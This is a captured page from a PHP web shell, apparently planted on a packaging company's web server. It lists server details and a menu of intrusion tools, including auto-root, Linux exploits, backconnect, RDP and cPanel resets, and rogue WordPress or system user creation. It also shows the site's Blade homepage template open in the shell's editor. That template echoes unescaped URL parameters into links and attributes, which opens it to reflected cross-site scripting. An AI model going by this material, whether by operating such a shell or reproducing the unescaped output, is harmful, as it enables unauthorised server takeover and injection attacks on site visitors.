Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.118
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
noahpackaging.com /
source /
resources /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
client_panel
[ DIR ]
drwxr-xr-x
emails
[ DIR ]
drwxr-xr-x
errors
[ DIR ]
drwxr-xr-x
exports
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
about_us.blade.php
1.05
KB
-rw-r--r--
beat_my_quote.blade.php
11.62
KB
-rw-r--r--
blogs.blade.php
3.25
KB
-rw-r--r--
category_products.blade.php
36.88
KB
-rw-r--r--
contact_us.blade.php
10.13
KB
-rw-r--r--
custom_printed_boxes.blade.php
57.52
KB
-rw-r--r--
dashboard.blade.php
4.07
KB
-rw-r--r--
em.blade.php
4.76
KB
-rw-r--r--
faqs.blade.php
828
B
-rw-r--r--
imagesitemap.blade.php
1.89
KB
-rw-r--r--
index.blade.php
50.29
KB
-rw-r--r--
index_old.blade.php
43.6
KB
-rw-r--r--
latest_offers.blade.php
58.09
KB
-rw-r--r--
personalized_packaging_boxes.b...
6.41
KB
-rw-r--r--
portfolio.blade.php
1.99
KB
-rw-r--r--
post.blade.php
3.01
KB
-rw-r--r--
privacy_security.blade.php
1.05
KB
-rw-r--r--
product_detail.blade.php
45.81
KB
-rw-r--r--
review.blade.php
9.18
KB
-rw-r--r--
search.blade.php
3.12
KB
-rw-r--r--
sitemap.blade.php
6.52
KB
-rw-r--r--
sitemapxml.blade.php
2.49
KB
-rw-r--r--
templates.blade.php
42.18
KB
-rw-r--r--
terms.blade.php
1006
B
-rw-r--r--
test.blade.php
41.6
KB
-rw-r--r--
thank_you.blade.php
1.61
KB
-rw-r--r--
welcome.blade.php
72.5
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.blade.php
@extends('layouts.app') @push('styles') <style> .main_banner { background-image: url('{{ 'https://noahpackaging.com/assets/sliders/'.$banners->image }}' ) !important; } </style> <script> let width = screen.width; </script> <?php if(isset($_GET['gclid'])){ $gclid=$_GET['gclid']; }else{ $gclid=''; } ?> <?php if(isset($_GET['msclkid'])){ $MSCLKID=$_GET['msclkid']; }else{ $MSCLKID=''; } if(isset($_GET['gad_source'])){ $gad_source=$_GET['gad_source']; }else{ $gad_source=''; } ?> @endpush @section('contents') <section> <div class="container"> <div class="main_banner"> <div class="row" style="height: 100%"> <div class="col-lg-6"> <div class="main_heading"> <h1> Custom <br /> Packaging Boxes </h1> <p>for Perfect Branding</p> <button type="button" onclick="$zoho.salesiq.floatwindow.visible("show");" class="btn btn-lg btn-dark"> Talk to Our Expert </button> </div> </div> <div class="col-lg-6 py-3"> <div class="f_form"> <div class="main_card" style=" box-shadow: rgba(50, 50, 93, 0.25) 0px 50px 100px -20px, rgba(0, 0, 0, 0.3) 0px 30px 60px -30px, rgba(10, 37, 64, 0.35) 0px -2px 6px 0px inset !important; width: 85%; " > <div class="text-center gq">Get Free Estimate</div> @if(!empty(session('error'))) <div class="alert alert-danger"> {{ session('error') }} </div> @endif <form id="get_quote_header" action="{{ route('home_get_quote') }}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>" method="post" class="get_quote_header"> @csrf <div class="row py-2"> <div class="col-md-6 col-md-6sss"> <div class="form-group"> <label for="product_name_header">Product Name</label> <input class="form-control form-control-sm required" required name="product_name" id="product_name_header"> </div> </div> <div class="col-md-6 col-md-6sss"> <div class="form-group"> <label for="quantity_header">Quantity</label> <input type="text" name="quantity" id="quantity_header" class="form-control form-control-sm " required value="" min="1" max="100000"> <input type="hidden" name="qtype" value="<?php if($gclid){ echo 'Paid' .'( Google )' ;}elseif($MSCLKID){ echo 'Paid' .'( Bing )' ;}elseif($gad_source){ echo 'Paid' .'( Google )' ;} ?>"> <input type="hidden" required name="<?php if($gclid){ echo 'gclid';} ?><?php if($MSCLKID){ echo 'MSCLKID' ;} ?><?php if($gad_source){ echo 'gad_source' ;} ?>" class="form-control search_input_top" placeholder="Search" value="<?php if($gclid){ echo $gclid ;} ?><?php if($MSCLKID){ echo $MSCLKID ;} ?><?php if($gad_source){ echo $gad_source ;} ?>"> </div> </div> <div class="col-md-6 col-md-6sss"> <div class="form-group"> <label for="name_header">Name</label> <input class="form-control form-control-sm required" required name="contact_name" id="name_header"> </div> </div> <div class="col-md-6 col-md-6sss"> <div class="form-group"> <label for="phone_header">Phone</label> <input class="form-control form-control-sm required" required="" name="contact_phone" id="phone_header" type="text"> </div> </div> <div class="col-md-12 "> <div class="form-group"> <label for="email_header"> Email Address</label> <input class="form-control form-control-sm required" required="" name="contact_email" id="email_header"> </div> </div> </div> <div class="row py-2"> <div class="col-lg-12"> <div class="form-group"> <label for="message_header">Description</label> <textarea class="form-control textareas form-control-sm" name="message" rows="2" id="message_header" placeholder="write short message" spellcheck="false"></textarea> </div> </div> </div> <div class="row"> <div class="col-md-2 col-md-2s"> <input id="num1_header" placeholder="num1" class="sum form-control form-control-sm" type="text" name="num1" value="<?php echo rand(1,4) ?>" readonly="readonly" /> </div> <div class="col-md-1 col-md-1s py-2"> <span style="font-size: 16px !important;color: black;">+</span> </div> <div class="col-md-2 col-md-2s"> <input id="num2_header" placeholder="num2" class="sum form-control form-control-sm" type="text" name="num2" value="<?php echo rand(5,9) ?>" readonly="readonly" /> </div> <div class="col-md-1 col-md-1s py-2"> <span style="font-size: 16px !important;color: black;">=</span> </div> <div class="col-md-2 col-md-2s"> <div class="form-group input-placeholder"> <input id="captcha_header" class="captcha_header form-control form-control-sm " placeholder="Ans" required type="text" name="captcha" maxlength="2" /><br> </div> </div> <div class="col-md-4 col-md-6sss"> <span id="spambot_header" style="font-size: 12px !important;color:black">(Are you human, or spambot?)</span> </div> </div> <div class="col-lg-11 col-lg-11s text-center"> <button type="submit" class="btn btn-roundeds btn-primary">Submit</button> </div> </form> </div> </div> </div> </div> </div> </div> <div class="container"> <div class="row py-3 rows"> @foreach($products as $p) <div class="ec_cat_content ec_cat_content_1 col-lg-4 col-md-6 col-6"> <div class="ec_cat_inner"> <div class="ec-category-image"> <a href="{{url('/').'/'.$p->slug}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>"> <img src="{{asset('assets/categories/'.$p->category_image)}}" loading="lazy" alt="{{$p->title}}" height="163" width="163" /></a> </div> <div class="ec-category-desc"> <span>{{$p->title}}</span> <ul> <?php $pro=\App\Models\Categorypoints::where('category_id',$p->id)->get(); ?> @foreach ($pro as $cp) <li>{{$cp->point}}</li> @endforeach </ul> <a href="{{$p->slug}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>" class="cat-show-all" >Show All <i class="fas fa-angle-double-right"></i ></a> </div> </div> </div> @endforeach </div> </div> </section> <!-- .....Customize Your Packaging..... --> <div class="container py-5"> <div class="cust_box" style="background-image: url({{'https://noahpackaging.com/assets/frount/assets/images/offer_bg_4.webp'}});"> <div class="row py-5"> <div class="col-xl-5 col-md-12 col-sm-12 align-self-center ec-offer-content" > <span class="ec-offer-stitle">Start Today !</span> <span class="ec-offer-title" >Customize Your<br /> Packaging</span > <span class="ec-offer-desc" >Select From Wide Range of Collection</span > <span class="ec-offer-btn mt-3" ><a href="#" data-bs-toggle="modal" data-bs-target="#exampleModal" class="slide11 slide111"> Free Instant Quote<i class="fas fa-angle-double-right arrow" ></i></a ></span> </div> </div> </div> </div> <!-- ........FEATURE PRODUCTS......... --> <section> <div class="container py-5"> <div class="title_boxa"> <span>FEATURE PRODUCTS</span> </div> <div class="row"> @foreach($feature_product as $fp) <div class="col-lg-3 col-md-4 col-6 my-3"> <div class="ec-product-inner"> <div class="ec-pro-image-outer"> <a href="{{ url($fp->product_slug)}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>" class="image"> <div class="ec-pro-image"> <img class="main-image" src="{{ asset('assets/products/'.$fp->product_image) }}" loading="lazy" alt="{{$fp->product_alt}}" width="318" height="318" /> <div class="ec-pro-loader"></div> </div> </a> </div> <div class="ec-pro-content"> <a href="{{ url($fp->product_slug)}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>" ><span class="ec-pro-stitle">{{$fp->product_title}}</span></a> </div> </div> </div> @endforeach </div> </div> </section> <!-- .......Simplified Process ...... --> <section> <div class="container py-5"> <div class="Process_title"> <span>Simplified Process to Order Your Custom Boxes</span> </div> <div class="row d-flex justify-content-center align-items-center"> <div class="col-lg-2s col-md-6 col-6 my-5"> <div class="parentContainer"> <img src="{{asset('assets/frount/assets/images/1.webp')}}" alt="Noah Packaging" width="250px" height="343px" loading="lazy" /> <span class="centereds she">Share Your Measurements</span> <p class="centered"> Measure your product's dimensions accurately to find the right box size. If you have any questions or need guidance, our expert team is here to assist you. </p> </div> </div> <div class="col-lg-2s col-md-6 col-6 my-5"> <div class="parentContainer"> <img src="{{asset('assets/frount/assets/images/2.webp')}}" alt="Noah Packaging" width="250px" height="343px" loading="lazy" /> <span class="centereds">Mention Box Style</span> <p class="centered"> After knowing your product's size, explore our library of box styles. If you're looking for something unique, our custom design service is also available to cater to your needs. </p> </div> </div> <div class="col-lg-2s col-md-6 col-6 my-5"> <div class="parentContainer"> <img src="{{asset('assets/frount/assets/images/3.webp')}}" alt="Noah Packaging" width="250px" height="343px" loading="lazy" /> <span class="centereds">Request A Quote</span> <p class="centered"> Once you share all the information, our estimation team works diligently and usually provides a quote within an hour. This quote includes the cost per box and the amount for the entire job. </p> </div> </div> <div class="col-lg-2s col-md-6 col-6 my-5"> <div class="parentContainer"> <img src="{{asset('assets/frount/assets/images/4.webp')}}" alt="Noah Packaging" width="250px" height="343px" loading="lazy" /> <span class="centereds">Process Your Order </span> <p class="centered"> After approving the box’s design, reach out to our experts to process the order. We're here to assist you at every step, ensuring it smoothly transitions to the shipment department. </p> </div> </div> <div class="col-lg-2s col-md-6 col-6 my-5"> <div class="parentContainer"> <img src="{{asset('assets/frount/assets/images/5.webp')}}" alt="Noah Packaging" width="250px" height="343px" loading="lazy" /> <span class="centereds">Production & Shipping</span> <p class="centered"> Track your order in real-time. Make secure payments, and receive your order within an average of 10-15 business days. Our shipping across the USA is free. </p> </div> </div> </div> </div> </section> <!-- .......Get Custom Quote ........ --> <section> <div class="container py-5"> <div class="get_but"><span class="cust_title">Get Custom Quote</span></div> <div class="row"> <div class="col-lg-6 my-3"> <div class="card cards" style=" box-shadow: rgba(50, 50, 93, 0.25) 0px 50px 100px -20px, rgba(0, 0, 0, 0.3) 0px 30px 60px -30px, rgba(10, 37, 64, 0.35) 0px -2px 6px 0px inset !important; "> @if(!empty(session('error'))) <div class="alert alert-danger"> {{ session('error') }} </div> @endif <form id="get_quote" action="{{ route('home_get_quote') }}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>" method="post" class="get_quote"> @csrf <div class="row"> <div class="col-md-3 col-md-3s"> <div class="form-group"> <label for="product_length">Length</label> <input name="product_length" id="product_length" class="form-control form-control-sm" placeholder="L"> </div> </div> <div class="col-md-3 col-md-3s"> <div class="form-group"> <label for="product_width">Width</label> <input name="product_width" id="product_width" class="form-control form-control-sm" placeholder="W"> </div> </div> <div class="col-md-3 col-md-3s"> <div class="form-group"> <label for="product_depth">Height</label> <input name="product_depth" id="product_depth" class="form-control form-control-sm" placeholder="Height"> </div> </div> <div class="col-md-3 col-md-3s"> <div class="form-group"> <label for="units">Unit</label> <select class="form-control form-select form-select-sm required" name="measurement_units" id="units"> <option value="cm">cm</option> <option value="mm">mm</option> <option selected="" value="inches">inch</option> </select> </div> </div> </div> <div class="row py-2"> <div class="col-md-4 col-md-6s"> <div class="form-group"> <label for="quantity">Quantity</label> <input type="text" name="quantity" id="quantity" class="form-control form-control-sm " required value="" min="1" max="100000"> <input type="hidden" name="qtype" value="<?php if($gclid){ echo 'Paid' .'( Google )' ;}elseif($MSCLKID){ echo 'Paid' .'( Bing )' ;}elseif($gad_source){ echo 'Paid' .'( Google )' ;} ?>"> <input type="hidden" required name="<?php if($gclid){ echo 'gclid';} ?><?php if($MSCLKID){ echo 'MSCLKID' ;} ?><?php if($gad_source){ echo 'gad_source' ;} ?>" class="form-control search_input_top" placeholder="Search" value="<?php if($gclid){ echo $gclid ;} ?><?php if($MSCLKID){ echo $MSCLKID ;} ?><?php if($gad_source){ echo $gad_source ;} ?>"> </div> </div> <div class="col-md-4 col-md-6s"> <div class="form-group"> <label for="color">Select Color</label> <select name="color" id="color" class="form-control form-select form-select-sm"> <option value="">Select Color</option> <option value="1 Color">1 Color</option> <option value="2 Color">2 Color</option> <option value="3 Color">3 Color</option> <option value="4 Color">4 Color</option> <option value="4/1 Color">4/1 Color</option> <option value="4/2 Color">4/2 Color</option> <option value="4/3 Color">4/3 Color</option> <option value="4/4 Color">4/4 Color</option> </select> </div> </div> <div class="col-md-4 col-md-6s"> <div class="form-group"> <label for="product_name">Product Name</label> <input class="form-control form-control-sm required" required name="product_name" id="product_name"> </div> </div> <div class="col-md-4 col-md-6s"> <div class="form-group"> <label for="name">Name</label> <input class="form-control form-control-sm required" required name="contact_name" id="name"> </div> </div> <div class="col-md-4 col-md-6s"> <div class="form-group"> <label for="phone">Phone</label> <input class="form-control form-control-sm required" required="" name="contact_phone" id="phone" type="text"> </div> </div> <div class="col-md-4 col-md-6s"> <div class="form-group"> <label for="email"> Email Address</label> <input class="form-control form-control-sm required" required="" name="contact_email" id="email"> </div> </div> </div> <div class="row py-2"> <div class="col-lg-12"> <div class="form-group"> <label for="message">Description</label> <textarea class="form-control textareas form-control-sm" name="message" rows="2" id="message" placeholder="write short message" spellcheck="false"></textarea> </div> </div> </div> <div class="row"> <div class="col-md-2 col-md-2s col-3"> <input id="num11" placeholder="num1" class="sum form-control form-control-sm" type="text" name="num1" value="<?php echo rand(1,4) ?>" readonly="readonly" /> </div> <div class="col-md-1 col-md-1s py-2 col-1"> <span>+</span> </div> <div class="col-md-2 col-md-2s col-3"> <input id="num21" placeholder="num2" class="sum form-control form-control-sm" type="text" name="num2" value="<?php echo rand(5,9) ?>" readonly="readonly" /> </div> <div class="col-md-1 col-md-1s py-2 col-1"> <span>=</span> </div> <div class="col-md-2 col-md-2s col-4"> <div class="form-group input-placeholder"> <input id="captcha1" class="captcha1 form-control form-control-sm " placeholder="Ans" required type="text" name="captcha" maxlength="2" /><br> </div> </div> <div class="col-md-4 "> <span id="spambot1" style="font-size: 11px">(Are you human, or spambot?)</span> </div> </div> <div class="col-lg-11 col-lg-11s mt-2"> <button type="submit" class="btn btn-roundeds btn-primary">Submit</button> </div> </form> </div> </div> <div class="col-lg-6 my-3"> <div class="imag_box" style="background-image: url({{'https://noahpackaging.com/assets/frount/assets/images/Customize-Your-Packaging-with-Design-Support-Noah-Packaging.webp'}}) !important;" loading="lazy"></div> </div> </div> </div> </section> <!-- .........TESTIMONIAL ........... --> <section> <div class="container"> <div class="row"> <div class="col-lg-3 col-md-12"> <div class="row"> <div class="col-lg-12 d_none"> <div class="title_boxes"> <span>TESTIMONIAL</span> </div> <div class="slider1 border my-4"> <div id="carouselExampleDark" class="carousel carousel-dark slide" data-bs-ride="carousel"> <div class="carousel-indicators"> @foreach($testimonials as $index => $testimonial) <button type="button" data-bs-target="#carouselExampleDark" data-bs-slide-to="{{$index}}" @if($index == 0) class="active" @endif aria-label="Slide {{$index + 1}}" ></button> @endforeach </div> <div class="carousel-inner"> @foreach($testimonials as $index => $testimonial) <div class="carousel-item @if($index == 0){{'active'}}@endif" data-bs-interval="3000"> <div class="card_slid"> <div class="carousel-caption d-md-block card_s"> @if($testimonial->image) <img src="{{ asset('assets/testimonials/'.$testimonial->image) }}" class="img-fluid blur-up lazyload" alt="Testimonial" loading="lazy"> @else <div class="card_title"> <span> <?php $zd=explode(' ', $testimonial->client_name)?> {{ strtoupper(mb_substr($zd[0], 0, 1)) }} @if(!empty($zd[1])) {{ strtoupper(mb_substr($zd[1], 0, 1)) }} @endif </span> </div> @endif <span>{{ $testimonial->client_name }}</span> <span>- {{ $testimonial->designation }}</span> <i class="fas fa-quote-right h5"></i> <p style="text-align: justify"> <?php $comments = strip_tags(substr($testimonial->comments, 0, 145)); echo $comments.'...'; ?> </p> </div> </div> </div> @endforeach </div> <!-- Carousel Controls (uncomment if needed) --> <!-- <button class="carousel-control-prev" type="button" data-bs-target="#carouselExampleDark" data-bs-slide="prev"> <span class="carousel-control-prev-icon" aria-hidden="true"></span> <span class="visually-hidden">Previous</span> </button> <button class="carousel-control-next" type="button" data-bs-target="#carouselExampleDark" data-bs-slide="next"> <span class="carousel-control-next-icon" aria-hidden="true"></span> <span class="visually-hidden">Next</span> </button> --> </div> </div> </div> </div> </div> <div class="col-lg-8 col-md-12"> <div class="row"> <div class="col-lg-12"> <div class="title_boxes"> <span>NEW PRODUCTS</span> </div> <div class="row d-flex justify-content-center align-items-center"> @foreach($new_arrivals as $product) <div class="col-lg-4 col-md-6 col-6 my-3"> <div class="ec-product-inner"> <div class="ec-pro-image-outer"> <a href="{{ url($product->product_slug)}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>" class="image"> <div class="ec-pro-image"> <img class="main-image" src="{{ asset('assets/products/'.$product->product_image) }}" alt="{{$product->product_alt}}" width="318" height="318" loading="lazy" /> <div class="ec-pro-loader"></div> </div> </a> </div> <div class="ec-pro-content"> <a href="{{ url($product->product_slug)}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>" ><span class="ec-pro-stitle"><?php echo $product->product_name;?></span></a > </div> </div> </div> @endforeach </div> </div> </div> </div> </div> </div> </section> <!-----------Content-------------------> <section> <div class="container"> <div class="row cards"> <div class="content scrollbar" id="style-2"> <div class="force-overflow"> <h2>{!! $page_details->page_heading !!}</h2> {!! $page_details->page_content !!} </div> </div> </div> </div> </section> <!----------FAQS------------------------> @if(count($faqs)>0) <section> <div class="container"> <div class="row"> <div class="accordion" id="accordionExample"> <span style="font-size: 22px; font-weight: 700; margin-bottom: 0; color: #000; letter-spacing: .4px; position: relative; display: inline; padding: 0; text-transform: uppercase; line-height: 1;">FREQUENTLY ASKED QUESTIONS </span> @foreach($faqs as $x => $s) <div class="accordion-item"> <span class="accordion-header" id="heading<?php echo $x?>"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse<?php echo $x?>" aria-expanded="true" aria-controls="collapse<?php echo $x?>" > {{$s->question}} </button> </span> <div id="collapse<?php echo $x?>" class="accordion-collapse collapse" aria-labelledby="heading<?php echo $x?>" data-bs-parent="#accordionExample" > <div class="accordion-body"> <?php $anss=\App\Models\FaqsAnswer::where('qid',$s->id)->first(); ?> <p>{!! $anss['answer'] ??'' !!}</p> </div> </div> </div> @endforeach </div> </div> </div> </section> @endif <!---------slider-------------------------> {{--<section> <div class="container"> <div class="trigger section gutter-horizontal bg-gray gutter-vertical--m gutter-horizontal py-5" style="width: 100%; max-width: 100%" > <div class="customer-logos slider"> <div class="slide-in-right slide"> <a href="#" ><img src="{{asset('assets/frount/assets/images/1 (1).webp')}}" alt="Kinderhotel Aschauerhof" height="95" width="190" loading="lazy" alt="Kinderhotel" /></a> </div> <div class="slide-in-right slide"> <a href="#" ><img src="{{asset('assets/frount/assets/images/2 (1).webp')}}" height="95" width="190" loading="lazy" alt="Kinderhotel" /></a> </div> <div class="slide-in-right slide"> <a href="#" ><img src="{{asset('assets/frount/assets/images/3 (1).webp')}}" height="95" width="190" loading="lazy" alt="Kinderhotel" /></a> </div> <div class="slide-in-right slide"> <a href="#" ><img src="{{asset('assets/frount/assets/images/4 (1).webp')}}" height="95" width="190" loading="lazy" alt="Kinderhotel" /></a> </div> <div class="slide-in-right slide"> <a href="#" ><img src="{{asset('assets/frount/assets/images/5 (1).webp')}}" height="95" width="190" loading="lazy" alt="Tannenmuehle" /></a> </div> <div class="slide-in-right slide"> <a href="#" ><img src="{{asset('assets/frount/assets/images/6.webp')}}" height="95" width="190" alt="Loeffele" loading="lazy" /></a> </div> <div class="slide-in-right slide"> <a href="#" ><img src="{{asset('assets/frount/assets/images/7.webp')}}" alt="Krone" height="95" width="190" loading="lazy" /></a> </div> <div class="slide-in-right slide"> <a href="#" ><img src="{{asset('assets/frount/assets/images/8.webp')}}" alt="Obereggen" height="95" width="190" loading="lazy" /></a> </div> </div> </div> </div> </section> --}} <!--Footer Slider------------------------> <section> <div class="hero-container"> <div class="row m-0 p-0"> <div class="main_slide"> <div class="bd_slide"> <div class="bd_slider_imgs"> @foreach($best_values as $product) <div class="slidF"> <a href="{{ url($product->product_slug)}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>"> <img src="{{ asset('assets/products/'.$product->product_image) }}" loading="lazy" alt="{{$product->product_alt}}" width="230px" height="230px" class="mb-3" /> </a> <a href="{{ url($product->product_slug)}}<?php if($gclid){ echo '?gclid='.$gclid ;} ?><?php if($MSCLKID){ echo '?msclkid='.$MSCLKID ;} ?><?php if($gad_source){ echo '?gad_source='.$gad_source ;} ?>"> <span>{{$product->product_title}}</span> </a> </div> @endforeach </div> </div> </div> </div> </section> @endsection @push('scripts') <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.19.3/jquery.validate.min.js"></script> <script> var myCarousel = document.querySelector('#carouselExampleDark') var carousel = new bootstrap.Carousel(myCarousel, { interval: 2000, wrap: false }) const content = document.querySelector(".content-inner"); const contentFull = document.querySelector(".content-full"); const more = document.querySelector(".read-more"); let open = false; if (more) { more.addEventListener("click", (e) => { if (open) { content.removeAttribute("style"); e.target.innerText = "Read more"; open = false; } else { content.style.maxHeight = `${contentFull.clientHeight}px`; e.target.innerText = "Read less"; open = true; } }); } $.validator.addMethod('captcha1', function (value) { var result = (parseInt($('#num11').val()) + parseInt($('#num21').val()) == parseInt(value)); $('#spambot1').fadeOut('fast'); return result; }, 'Incorrect value, please try again.' ); $(document).ready(function() { $.validator.addMethod('captcha_instant', function(value, element) { var result = (parseInt($('#num1_instant').val()) + parseInt($('#num2_instant').val()) == parseInt(value)); if (!result) { $('#spambot_instant').fadeIn('fast'); // Disable the submit button when captcha is incorrect $('#get_quote_instant').find(':submit').prop('disabled', true); } else { $('#spambot_instant').fadeOut('fast'); // Enable the submit button when captcha is correct $('#get_quote_instant').find(':submit').prop('disabled', false); } return result; }, 'Incorrect value, please try again.' ); $('#get_quote_instant').validate({ debug: false, rules: { captcha: { required: true, captcha_instant: true }, contact_phone: { required: true, // Assuming you have a valid phone number validation method }, contact_email: { required: true, email: true }, // Add other rules as needed }, messages: { captcha: { required: "* Required" }, // Add other custom error messages as needed }, highlight: function(element) { $(element).addClass('has-error'); }, unhighlight: function(element) { $(element).removeClass('has-error'); }, errorElement: 'span', errorClass: 'validation-error-message help-block form-helper bold', errorPlacement: function(error, element) { console.log(element); return true; } }); }); $('#get_quote').validate({ debug: false, rules: { contact_phone: { required: true, },product_name: { required: true, } }, highlight: function(element) { $(element).addClass('has-error'); }, unhighlight: function(element) { $(element).removeClass('has-error'); }, errorElement: 'span', errorClass: 'validation-error-message help-block form-helper bold', errorPlacement: function(error, element) { return true; } }); var banner=document.getElementById('banner'); const accordionBtns = document.querySelectorAll(".item-header"); accordionBtns.forEach((accordion) => { accordion.onclick = function () { this.classList.toggle("active"); let content = this.nextElementSibling; console.log(content); if (content.style.maxHeight) { //this is if the accordion is open content.style.maxHeight = null; } else { //if the accordion is currently closed content.style.maxHeight = content.scrollHeight + "px"; console.log(content.style.maxHeight); } }; }); $(document).ready(function() { $.validator.addMethod('captcha', function(value) { var result = (parseInt($('#num1_header').val()) + parseInt($('#num2_header').val()) == parseInt($('#captcha_header').val())); $('#spambot_header').fadeOut('fast'); return result; }, 'Incorrect value, please try again.' ); $('#get_quote_header').validate({ rules: { contact_name: { required: true }, contact_phone: { required: true, // Add any additional rules for phone number validation if needed }, contact_email: { required: true, email: true }, captcha: { required: true, captcha: true } }, messages: { captcha: { required: 'Please enter the captcha value.' } // Add any additional custom error messages as needed }, highlight: function(element) { $(element).closest('.form-group').addClass('has-error'); }, unhighlight: function(element) { $(element).closest('.form-group').removeClass('has-error'); }, errorElement: 'span', errorClass: 'validation-error-message help-block form-helper bold', errorPlacement: function(error, element) { console.log(element); return true; }, submitHandler: function(form) { // Your custom form submission logic goes here form.submit(); } }); }); </script> @endpush
Close